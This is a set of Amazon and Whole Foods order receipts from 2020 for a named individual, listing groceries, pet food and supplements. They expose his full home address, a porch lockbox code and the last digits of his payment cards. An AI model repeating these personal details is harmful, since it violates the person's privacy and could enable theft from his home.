$3.99 Sold by: Whole Foods Market (seller profile) Condition: New 2 of: Evolved Chocolate -Organic Keto Chocolate Bar, Midnight Coconut, 100% $4.99 Cacao -Keto, Dairy-Free, Soy-Free, Paleo Friendly, Vegan Friendly, No Added Sugar, Dark Chocolate -2.3 oz each (8 Count) Sold by: Whole Foods Market (seller profile) Condition: New 2 of: Mini Babybel Cheese, Sharp Cheddar, 6 Count $3.49 Sold by: Whole Foods Market (seller profile) Condition: New Shipping Address: Brian J Coady 1454 Monroe St. NW Washington, DC 20010 United States Shipping Speed: Scheduled delivery Payment information Payment Method: Item(s) Subtotal: $119.24 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $119.24 Brian J Coady Estimated tax to be collected: $0.28 1454 Monroe St. NW Washington, DC 20010 Tip (optional): 7.00 United States Credit Card transactions AmazonPLCC ending in 3157: September 30, 2020: $7.00 AmazonPLCC ending in 3157: September 28, 2020:$119.52 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates Final Details for Order #111-0566414-7133010 Subscribe and Save Order Placed: September 13, 2020 Amazon.com order number: 111-0566414-7133010 Order Total: $11.48 This order contains Subscribe & Save items. Shipped on September 23, 2020 Items Ordered Price 1 of: Doctor's Best High Absorption CoQ10 with BioPerine, Gluten Free, Naturally Fermented, Heart Health, Energy Production,100 mg 120 Softgels Sold by: Amazon.com Services LLC $14.35 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW Porch lockbox code 5977# WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $14.35 Visa | Last digits: 0222 Shipping & Handling: $0.00 Gift Card Subscribe & Save: -$2.87 Billing address Total before tax: $11.48Brian J Coady Estimated tax to be collected: $0.001454 Monroe St. NW Washington, DC 20010 Grand Total:$11.48 United States Credit Card transactions Visa ending in 0222: September 23, 2020:$11.48 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #113-4527248-4356249 Subscribe and Save Order Placed: September 13, 2020 Amazon.com order number: 113-4527248-4356249 Order Total: $12.09 This order contains Subscribe & Save items. Shipped on September 23, 2020 Items Ordered Price 1 of: Lakanto Monkfruit Sweetener, 1:1 Sugar Substitute, Keto, Non-GMO (Golden 1.76 lbs) Sold by: Lakanto (seller profile) $14.22 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW Porch lockbox code 5977# WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $14.22 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Gift Card Subscribe & Save: -$2.13 Billing address Total before tax: $12.09Brian J Coady Estimated tax to be collected: $0.001454 Monroe St. NW Washington, DC 20010 Grand Total:$12.09 United States Credit Card transactions AmazonPLCC ending in 3157: September 23, 2020:$12.09 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-5461751-6997056 Subscribe and Save Order Placed: September 13, 2020 Amazon.com order number: 111-5461751-6997056 Order Total: $25.49 This order contains Subscribe & Save items. Shipped on September 21, 2020 Items Ordered Price 1 of: Amazon Brand -Solimo Red Energy Drink, Sugar Free, 16 Fluid Ounce (Pack of 24) Sold by: Amazon.com Services LLC $27.76 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW Porch lockbox code 5977# WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $27.76 Visa | Last digits: 0222 Shipping & Handling: $0.00 Subscribe & Save: -$4.16 Billing address Brian J Coady Total before tax: $23.601454 Monroe St. NW Estimated tax to be collected: $1.89Washington, DC 20010 United States Grand Total:$25.49 Credit Card transactions Visa ending in 0222: September 21, 2020:$25.49 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #112-0718320-8683441 Order Placed: September 13, 2020 Amazon.com order number: 112-0718320-8683441 Order Total: $61.91 Shipped on September 14, 2020 Items Ordered 1 of: 365 Everyday Value, Distilled Water, 128 fl oz Sold by: Whole Foods Market (seller profile) Price $0.99 Condition: New 1 of: 365 Everyday Value, Spring Water, 1 gallon Sold by: Whole Foods Market (seller profile) $0.89 Condition: New 1 of: Organic Heavy Whipping Cream Sold by: Whole Foods Market (seller profile) $4.49 Condition: New 1 of: Kitu Super Coffee, SugarFree Keto Coffee (0g Added Sugar, 10g Protein, 80 Calories) [Hazelnut] 12 Fl Oz, 1 Pack | Iced Coffee, Protein Coffee, Coffee Drinks -LactoseFree, SoyFree, GlutenFree Sold by: Whole Foods Market (seller profile) $3.49 Condition: New 1 of: GT's Kombucha, Guava Goddess 16 Fl Oz Sold by: Whole Foods Market (seller profile) $2.25 Condition: New 2 of: 365 Everyday Value, Dark Sweet Cherries, 16 oz, (Frozen) Sold by: Whole Foods Market (seller profile) $4.69 Condition: New 1 of: GT's Kombucha, Gingerberry 16 Fl Oz Sold by: Whole Foods Market (seller profile) $2.25 Condition: New 2 of: Natural By Nature, 100% Organic Heavy Cream, 16 Oz Sold by: Whole Foods Market (seller profile) $3.49 Condition: New 2 of: Mini Babybel Cheese, Original, 6 Count Sold by: Whole Foods Market (seller profile) $2.24 Condition: New 1 of: Vermont Creamery, Crème Fraîche, 8 oz Sold by: Whole Foods Market (seller profile) $5.99 Print this page for your records. Condition: New 5 (1.50 lb) of: Organic Nectarine Sold by: Whole Foods Market (seller profile) ($2.24/lb $3.36 Condition: New 4 of: Gts Living Foods, Kombucha Pomegranate Power Organic, 16 Fl Oz Sold by: Whole Foods Market (seller profile) $2.25 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW Porch lockbox code 5977# WASHINGTON, DC 20010-3139 United States Shipping Speed: Scheduled delivery Payment information Payment Method: Item(s) Subtotal: $53.55 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $53.55Brian J Coady Estimated tax to be collected: $1.361454 Monroe St. NW Washington, DC 20010 Tip (optional): 7.00United States Grand Total:$61.91 Credit Card transactions AmazonPLCC ending in 3157: September 16, 2020: $7.00 AmazonPLCC ending in 3157: September 14, 2020:$54.91 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-0965614-5781010 Order Placed: September 14, 2020 Amazon.com order number: 114-0965614-5781010 Seller's order number: 678033 Order Total: $34.93 Shipped on September 14, 2020 Items Ordered 1 of: Creamright Ultra-Purewhip 50-Pack N2O Whipped Cream Chargers Sold by: Waterline Companies (seller profile) Price $32.95 Condition: New Shipping Address: Brian J Coady 1454 Monroe St. NW Washington, DC 20010 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $32.95 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $32.95Brian J Coady Estimated tax to be collected: $1.981454 Monroe St. NW Washington, DC 20010 Grand Total:$34.93 United States Credit Card transactions AmazonPLCC ending in 3157: September 14, 2020:$34.93 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-2398948-8483461 Order Placed: September 14, 2020 Amazon.com order number: 114-2398948-8483461 Order Total: $56.49 Shipped on September 14, 2020 Items Ordered Price 1 of: COVAFLU KN95 Disposable Fold Flat Face Mask (Pack of 10 KN95 Face Masks) Sold by: Clinova (seller profile) $29.99 Condition: New 1 of: GuardH Bleach Tablets -40 Count. Bleach for Laundry and Multipurpose Cleaning. Sold by: GuardH (seller profile) | Product question? Ask Seller $8.90 Condition: New 1 of: Honeywell North 5500 Series Niosh-Approved Half Mask Respirator, Medium (550030M) Sold by: Amazon.com Services LLC $14.41 Condition: New Shipping Address: Brian J Coady 1454 Monroe St. NW Washington, DC 20010 United States Shipping Speed: Rush Shipping Payment information Payment Method: Item(s) Subtotal: $53.30 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $2.99 Free Shipping: -$2.99 Billing address Brian J Coady Total before tax: $53.30 1454 Monroe St. NW Estimated tax to be collected: $3.19 Washington, DC 20010 United States Grand Total:$56.49 Credit Card transactions AmazonPLCC ending in 3157: September 14, 2020:$56.49 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates Final Details for Order #112-9823056-8614647 Subscribe and Save Order Placed: September 15, 2020 Amazon.com order number: 112-9823056-8614647 Order Total: $14.99 This order contains Subscribe & Save items. Shipped on September 27, 2020 Items Ordered Price 1 of: TEMPTATIONS Classic Crunchy and Soft Cat Treats Tasty Chicken Flavor, 30 Oz. $15.78 Tub Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW Porch lockbox code 5977# WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $15.78 Visa | Last digits: 0222 Shipping & Handling: $0.00 Gift Card Subscribe & Save: -$0.79 Billing address Total before tax: $14.99Brian J Coady Estimated tax to be collected: $0.001454 Monroe St. NW Washington, DC 20010 Grand Total:$14.99 United States Credit Card transactions Visa ending in 0222: September 27, 2020:$14.99 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #113-5591561-6232247 Subscribe and Save Order Placed: September 16, 2020 Amazon.com order number: 113-5591561-6232247 Order Total: $13.72 This order contains Subscribe & Save items. Shipped on September 27, 2020 Items Ordered Price 1 of: SHEBA PERFECT PORTIONS Soft Wet Cat Food Paté Savory Chicken Entrée and Roasted Turkey Entrée Multipack, (24) 2.6 oz. Easy Peel Twin-Pack Trays Sold by: Amazon.com Services LLC $19.20 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW Porch lockbox code 5977# WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $19.20 Visa | Last digits: 0222 Shipping & Handling: $0.00 Gift Card Subscribe & Save: -$0.96 Extra Savings: -$4.52Billing address Brian J Coady Total before tax: $13.721454 Monroe St. NW Estimated tax to be collected: $0.00Washington, DC 20010 United States Grand Total:$13.72 Credit Card transactions Visa ending in 0222: September 27, 2020:$13.72 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-7805140-1504264 Subscribe and Save Order Placed: September 16, 2020 Amazon.com order number: 114-7805140-1504264 Order Total: $28.48 This order contains Subscribe & Save items. Shipped on September 26, 2020 Items Ordered Price 1 of: Amazon Brand -Solimo Red Energy Drink, Sugar Free, 16 Fluid Ounce (Pack of 24) Sold by: Amazon.com Services LLC $27.76 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW Porch lockbox code 5977# WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $27.76 Visa | Last digits: 0222 Shipping & Handling: $0.00 Gift Card Subscribe & Save: -$1.39 Billing address Total before tax: $26.37Brian J Coady Estimated tax to be collected: $2.111454 Monroe St. NW Washington, DC 20010 Grand Total:$28.48 United States Credit Card transactions Visa ending in 0222: September 26, 2020:$28.48 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #113-3889205-7483416 Subscribe and Save Order Placed: September 2, 2020 Amazon.com order number: 113-3889205-7483416 Order Total: $28.73 This order contains Subscribe & Save items. Shipped on September 13, 2020 Items Ordered Price 1 of: Amazon Brand -Solimo Red Energy Drink, Sugar Free, 16 Fluid Ounce (Pack of 24) Sold by: Amazon.com Services LLC $28.00 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW Porch lockbox code 5977# WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $28.00 Visa | Last digits: 0222 Shipping & Handling: $0.00 Gift Card Subscribe & Save: -$1.40 Billing address Total before tax: $26.60Brian J Coady Estimated tax to be collected: $2.131454 Monroe St. NW Washington, DC 20010 Grand Total:$28.73 United States Credit Card transactions Visa ending in 0222: September 13, 2020:$28.73 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-3321818-6183433 Order Placed: September 6, 2020 Amazon.com order number: 111-3321818-6183433 Order Total: $93.89 Shipped on September 6, 2020 Items Ordered 1 of: Amazon Brand -Happy Belly Heavy Whipping Cream, Ultra-Pasteurized, Kosher, Quart, 32 Fl Oz Sold by: Prime Now LLC (seller profile) Price $4.39 Condition: New 1 of: Earthbound Farms, Frozen Blueberry, Organic, 10 Oz (Frozen) Sold by: Prime Now LLC (seller profile) $3.67 Condition: New 3 of: Gatorade Zero Thirst Quencher, Berry, 28 Fl Oz Bottle Sold by: Prime Now LLC (seller profile) $0.99 Condition: New 5 of: Yellow Flesh Nectarine, One Sold by: Prime Now LLC (seller profile) $1.00 Condition: New 1 of: Califia Farms Unsweetened Almondmilk | Dairy Free | Whole30 | Keto | Vegan | Plant Based | Nut Milk | Non-GMO, 48 Fl Oz Sold by: Prime Now LLC (seller profile) $3.48 Condition: New 1 of: Horizon Organic, Heavy Whipping Cream, Pint, 16 oz Sold by: Prime Now LLC (seller profile) $4.18 Condition: New 1 of: DairyPure Heavy Whipping Cream Ultra-Pasteurized One Quart (946mL) Paper Carton Sold by: Prime Now LLC (seller profile) $7.68 Condition: New 1 of: Wyman's of Maine, Berry 3 Blend, 48 Ounce (Packaging May Vary) Sold by: Prime Now LLC (seller profile) $9.98 Condition: New 2 of: Wyman's of Maine, Berry 3 Blend, 48 Ounce (Packaging May Vary) Sold by: Prime Now LLC (seller profile) $9.98 Condition: New 2 of: Earth's Natural Alternative, Eco-Friendly, Compostable Plant Fiber 6" Plate, 50 $2.09 Print this page for your records. Pack, 50 Count Sold by: Prime Now LLC (seller profile) Condition: New 4 of: OLD CROC CHEESE XSHARP Sold by: Prime Now LLC (seller profile) $3.24 Condition: New 2 of: Gardein Seven Grain Crispy Tenders, Meatless Protein Packed Strips, Ready in 8 Minutes, 9 Ounces (Frozen) Sold by: Prime Now LLC (seller profile) $3.97 Condition: New Shipping Address: Brian J Coady 1454 Monroe St. NW Washington, DC 20010 United States Shipping Speed: Scheduled delivery Payment information Payment Method: Item(s) Subtotal: $86.39 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $86.39 Brian J Coady Estimated tax to be collected: $0.501454 Monroe St. NW Washington, DC 20010 Tip (optional): 7.00United States Grand Total:$93.89 Credit Card transactions AmazonPLCC ending in 3157: September 9, 2020: $7.00 AmazonPLCC ending in 3157: September 6, 2020:$86.89 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-8381153-1950612 Order Placed: August 22, 2020 Amazon.com order number: 114-8381153-1950612 Order Total: $65.90 Shipped on August 23, 2020 Items Ordered 2 (0.72 lb) of: Organic Nectarine Sold by: Whole Foods Market (seller profile) Price ($1.99/lb $1.43 Condition: New 1 of: Evolved Chocolate -Organic Keto Chocolate Bar, Midnight Coconut, 100% Cacao -Keto, Dairy-Free, Soy-Free, Paleo Friendly, Vegan Friendly, No Added Sugar, Dark Chocolate -2.3 oz each (8 Count) Sold by: Whole Foods Market (seller profile) $4.99 Condition: New 2 of: Nuggets Vegan General TSO Fresh Pack, 24 Ounce Sold by: Whole Foods Market (seller profile) $14.99 Condition: New 1 of: 365 Everyday Value, Almonds, Roasted & Salted, 16 oz Sold by: Whole Foods Market (seller profile) $6.99 Condition: New 3 of: Raspberry Red Organic, 6 Ounce Sold by: Whole Foods Market (seller profile) $2.70 Condition: New 1 of: 365 Everyday Value, Organic Berry Blend, 10 oz, (Frozen) Sold by: Whole Foods Market (seller profile) $3.49 Condition: New 1 of: 365 Everyday Value, Dark Sweet Cherries, 16 oz, (Frozen) Sold by: Whole Foods Market (seller profile) $4.69 Condition: New 1 of: 365 Everyday Value, Blueberries, 12 oz, (Frozen) Sold by: Whole Foods Market (seller profile) $2.99 Condition: New 1 of: 365 Everyday Value, Organic Chopped Kale, 12 oz Sold by: Whole Foods Market (seller profile) $3.99 Condition: New 1 of: Kitu Super Coffee, SugarFree Keto Coffee (0g Sugar, 10g Protein, 80 Calories) [Vanilla] 12 Fl Oz, 1 Pack | Iced Coffee, Protein Coffee, Coffee Drinks $2.57 Print this page for your records. From The Super Coffee Family Sold by: Whole Foods Market (seller profile) Condition: New 1 of: Strawberry Conventional, 16 Ounce $3.69 Sold by: Whole Foods Market (seller profile) Condition: New Shipping Address: Brian J Coady 1454 Monroe St. NW Washington, DC 20010 United States Shipping Speed: Scheduled delivery Payment information Payment Method: Item(s) Subtotal: $72.91 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Gift Card Courtesy Credit: -$5.00 Billing address Total before tax: $67.91Brian J Coady Estimated tax to be collected: $0.191454 Monroe St. NW Gift Card Amount: -$7.20Washington, DC 20010 United States Tip (optional): 5.00 Grand Total:$65.90 Credit Card transactions AmazonPLCC ending in 3157: August 25, 2020: $5.00 AmazonPLCC ending in 3157: August 23, 2020:$60.90 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-6123787-2942630 Subscribe and Save Order Placed: August 22, 2020 Amazon.com order number: 114-6123787-2942630 Order Total: $26.99 This order contains Subscribe & Save items. Shipped on September 22, 2020 Items Ordered Price 1 of: LES Labs Inflammatory Health, Joint Supplement for Joint & Muscle Pain and Discomfort, Mobility and Healthy Inflammation Response with Turmeric, Boswe Sold by: LES Labs (seller profile) $29.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW Porch lockbox code 5977# WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $29.99 Visa | Last digits: 0222 Shipping & Handling: $0.00 Gift Card Subscribe & Save: -$1.50 Subscribe & Save: -$1.50Billing address Brian J Coady Total before tax: $26.991454 Monroe St. NW Estimated tax to be collected: $0.00Washington, DC 20010 United States Grand Total:$26.99 Credit Card transactions Visa ending in 0222: September 22, 2020:$26.99 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-2401645-7447447 Subscribe and Save Order Placed: August 22, 2020 Amazon.com order number: 114-2401645-7447447 Order Total: $29.21 This order contains Subscribe & Save items. Shipped on August 29, 2020 Items Ordered Price 1 of: Amazon Brand -Solimo Red Energy Drink, Sugar Free, 16 Fluid Ounce (Pack of 24) Sold by: Amazon.com Services LLC $28.47 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW Porch lockbox code 5977# WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $28.47 Visa | Last digits: 0222 Shipping & Handling: $0.00 Gift Card Subscribe & Save: -$1.42 Billing address Total before tax: $27.05Brian J Coady Estimated tax to be collected: $2.161454 Monroe St. NW Washington, DC 20010 Grand Total:$29.21 United States Credit Card transactions Visa ending in 0222: August 29, 2020:$29.21 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-5431892-2633809 Subscribe and Save Order Placed: August 24, 2020 Amazon.com order number: 114-5431892-2633809 Order Total: $22.90 This order contains Subscribe & Save items. Shipped on August 29, 2020 Items Ordered Price 1 of: Cellucor C4 Original Sugar Free Sparkling Energy Drink Midnight Cherry | Pre Workout Performance Drink with No Artificial Colors or Dyes | 16oz (Pack Sold by: Amazon.com Services LLC $28.26 Condition: New Shipping Address: Brian J Coady 1454 Monroe St. NW Washington, DC 20010 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $28.26 Visa | Last digits: 0222 Shipping & Handling: $0.00 Gift Card Subscribe & Save: -$1.41 Your Coupon Savings: -$5.65Billing address Brian J Coady Total before tax: $21.201454 Monroe St. NW Estimated tax to be collected: $1.70Washington, DC 20010 United States Grand Total:$22.90 Credit Card transactions Visa ending in 0222: August 29, 2020:$22.90 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-8188987-9053821 Order Placed: August 25, 2020 Amazon.com order number: 114-8188987-9053821 Order Total: $112.46 Shipped on August 25, 2020 Items Ordered 1.00 lb of: Pasta Salad Asian Noodle Bam Fresh Pack, 24 Ounce Sold by: Whole Foods Market (seller profile) Price ($6.11/lb $6.11 Condition: New 1 of: Kitu Super Coffee, SugarFree Keto Coffee (0g Sugar, 10g Protein, 80 Calories) [Vanilla] 12 Fl Oz, 1 Pack | Iced Coffee, Protein Coffee, Coffee Drinks From The Super Coffee Family Sold by: Whole Foods Market (seller profile) $2.57 Condition: New 1 of: Gts Living Foods, Kombucha Rose Berry Organic, 16 Fl Oz Sold by: Whole Foods Market (seller profile) $3.49 Condition: New 1 of: Zevia Natural Orange Soda, Sugar Free, 12 oz, 6 pack Sold by: Whole Foods Market (seller profile) $4.05 Condition: New 1 of: Nuggets Vegan General TSO Fresh Pack, 24 Ounce Sold by: Whole Foods Market (seller profile) $14.99 Condition: New 1 of: Strawberry Conventional, 16 Ounce Sold by: Whole Foods Market (seller profile) $3.69 Condition: New 1 of: Zevia All Natural Soda, Black Cherry Zero, 72 fl oz (pack of 6) Sold by: Whole Foods Market (seller profile) $4.05 Condition: New 2 of: 365 Everyday Value, Organic Berry Blend, 10 oz, (Frozen) Sold by: Whole Foods Market (seller profile) $3.49 Condition: New 3 of: Raspberry Red Organic, 6 Ounce Sold by: Whole Foods Market (seller profile) $2.70 Condition: New 1 of: Zevia Natural Sugar Free Soda, Root Beer (6 Count, 12 Fl Oz Each) Sold by: Whole Foods Market (seller profile) $4.05 Print this page for your records. Condition: New 4 (1.49 lb) of: Organic Nectarine ($1.99/lb Sold by: Whole Foods Market (seller profile) $2.97 Condition: New 2 of: Wyman's of Maine, Berry 3 Blend, 48 Ounce (Packaging May Vary) $14.99 Sold by: Whole Foods Market (seller profile) Condition: New 2 of: 365 Everyday Value, Dark Sweet Cherries, 16 oz, (Frozen) $4.69 Sold by: Whole Foods Market (seller profile) Condition: New 1 of: 365 Everyday Value, Blueberries, 12 oz, (Frozen) $2.99 Sold by: Whole Foods Market (seller profile) Condition: New Shipping Address: Brian J Coady 1454 Monroe St. NW Washington, DC 20010 United States Shipping Speed: Scheduled delivery Payment information Payment Method: Item(s) Subtotal: $103.40 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $103.40 Brian J Coady Estimated tax to be collected: $2.061454 Monroe St. NW Washington, DC 20010 Tip (optional): 7.00United States Grand Total:$112.46 Credit Card transactions AmazonPLCC ending in 3157: August 27, 2020: $7.00 AmazonPLCC ending in 3157: August 25, 2020:$105.46 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-3942657-0967410 Subscribe and Save Order Placed: August 26, 2020 Amazon.com order number: 111-3942657-0967410 Order Total: $18.24 This order contains Subscribe & Save items. Shipped on September 4, 2020 Items Ordered Price 1 of: SHEBA PERFECT PORTIONS Soft Wet Cat Food Paté Savory Chicken Entrée and Roasted Turkey Entrée Multipack, (24) 2.6 oz. Easy Peel Twin-Pack Trays Sold by: Amazon.com Services LLC $19.20 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW Porch lockbox code 5977# WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $19.20 Visa | Last digits: 0222 Shipping & Handling: $0.00 Gift Card Subscribe & Save: -$0.96 Billing address Total before tax: $18.24Brian J Coady Estimated tax to be collected: $0.001454 Monroe St. NW Washington, DC 20010 Grand Total:$18.24 United States Credit Card transactions Visa ending in 0222: September 4, 2020:$18.24 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #112-9963273-8984204 Subscribe and Save Order Placed: August 26, 2020 Amazon.com order number: 112-9963273-8984204 Order Total: $14.98 This order contains Subscribe & Save items. Shipped on September 4, 2020 Items Ordered Price 1 of: TEMPTATIONS Classic Crunchy and Soft Cat Treats Tasty Chicken Flavor, 30 oz. $15.77 Tub Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW Porch lockbox code 5977# WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $15.77 Visa | Last digits: 0222 Shipping & Handling: $0.00 Gift Card Subscribe & Save: -$0.79 Billing address Total before tax: $14.98Brian J Coady Estimated tax to be collected: $0.001454 Monroe St. NW Washington, DC 20010 Grand Total:$14.98 United States Credit Card transactions Visa ending in 0222: September 4, 2020:$14.98 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-1170663-2095421 Order Placed: August 28, 2020 Amazon.com order number: 114-1170663-2095421 Order Total: $77.93 Shipped on August 29, 2020 Items Ordered 1 of: Gts Living Foods, Kombucha Pomegranate Power Organic, 16 Fl Oz Sold by: Whole Foods Market (seller profile) Price $2.25 Condition: New 1 of: 365 Everyday Value, Organic Berry Blend, 10 oz, (Frozen) Sold by: Whole Foods Market (seller profile) $3.49 Condition: New 2 of: Preserve Cutlery Set Kitchen Supplies, 24 CT, Apple Green Sold by: Whole Foods Market (seller profile) $5.39 Condition: New 1 of: Raspberry Red Organic, 6 Ounce Sold by: Whole Foods Market (seller profile) $2.70 Condition: New 2 of: Nuggets Vegan General TSO Fresh Pack, 24 Ounce Sold by: Whole Foods Market (seller profile) $14.99 Condition: New 4 of: Gts Living Foods, Kombucha Rose Berry Organic, 16 Fl Oz Sold by: Whole Foods Market (seller profile) $2.25 Condition: New 1 of: Califia Farms Unsweetened Keto Coffee Creamer, 16.9 Oz | Almondmilk & Coconut Cream | Low Calorie | Zero Carb | 500mg MCT | Dairy Free | Whole30 | Vegan | Plant Based | Nut Milk | Non-GMO Sold by: Whole Foods Market (seller profile) $4.49 Condition: New 1 of: KITU Vanilla Super Creamer, 25.4 FZ Sold by: Whole Foods Market (seller profile) $4.22 Condition: New 2 of: Mini Babybel Cheese, Original, 6 Count Sold by: Whole Foods Market (seller profile) $2.24 Condition: New Print this page for your records. Shipping Address: Brian J Coady 1454 Monroe St. NW Washington, DC 20010 United States Shipping Speed: Scheduled delivery Payment information Payment Method: Item(s) Subtotal: $71.39 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $71.39 Brian J Coady Estimated tax to be collected: $1.541454 Monroe St. NW Washington, DC 20010 Tip (optional): 5.00United States Grand Total:$77.93 Credit Card transactions AmazonPLCC ending in 3157: August 31, 2020: $5.00 AmazonPLCC ending in 3157: August 29, 2020:$72.93 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-8861035-0979404 Order Placed: August 31, 2020 Amazon.com order number: 114-8861035-0979404 Order Total: $86.21 Shipped on September 1, 2020 Items Ordered 1 of: OLD CROC, Sharp Cheddar Cheese Bites, 6 oz Sold by: Prime Now LLC (seller profile) Condition: New 2 of: Mini Babybel Cheese, Original, 6 Count Sold by: Prime Now LLC (seller profile) Condition: New 3 of: Yellow Flesh Nectarine, One Sold by: Prime Now LLC (seller profile) Condition: New 1 of: Kale, One Bunch Sold by: Prime Now LLC (seller profile) Condition: New 3 of: Gardein Seven Grain Crispy Tenders, Meatless Protein Packed Strips, Ready in 8 Minutes, 9 Ounces (Frozen) Sold by: Prime Now LLC (seller profile) Condition: New 2 of: Wyman's of Maine, Berry 3 Blend, 48 Ounce (Packaging May Vary) Sold by: Prime Now LLC (seller profile) Condition: New 2 of: 365 Everyday Value, Almonds, Roasted & Salted, 16 oz Sold by: Prime Now LLC (seller profile) Condition: New 3 of: Amazon Brand -Happy Belly Sharp Cheddar Cheese Block, 8 Ounce Sold by: Prime Now LLC (seller profile) Condition: New 1 of: 365 Everyday Value, Walnuts, Chopped, 8 oz Sold by: Prime Now LLC (seller profile) Condition: New 1 of: Chicken Thighs, Air-chilled, Boneless, Antibiotic-free, 1.5 lb Sold by: Prime Now LLC (seller profile) Price $4.99 $2.49 $1.15 $1.49 $3.97 $9.98 $6.99 $2.49 $4.99 $5.99 Shipping Address: Brian J Coady 1454 Monroe St. NW Washington, DC 20010 United States Shipping Speed: Scheduled delivery Payment information Payment Method: Item(s) Subtotal: $79.21 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $79.21 Brian J Coady Estimated tax to be collected: $0.001454 Monroe St. NW Washington, DC 20010 Tip (optional): 7.00United States Grand Total:$86.21 Credit Card transactions AmazonPLCC ending in 3157: September 3, 2020: $7.00 AmazonPLCC ending in 3157: September 1, 2020:$79.21 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #113-7385761-6961024 Order Placed: September 1, 2020 Amazon.com order number: 113-7385761-6961024 Order Total: $255.05 Shipped on September 1, 2020 Items Ordered 1 of: Wyman's of Maine, Berry 3 Blend, 48 Ounce (Packaging May Vary) Sold by: Whole Foods Market (seller profile) Price $14.99 Condition: New 1 of: Repurpose, Repurpose Assorted Eco-Cutlery, 24 Count Sold by: Whole Foods Market (seller profile) $2.51 Condition: New 1 of: 365 Everyday Value, 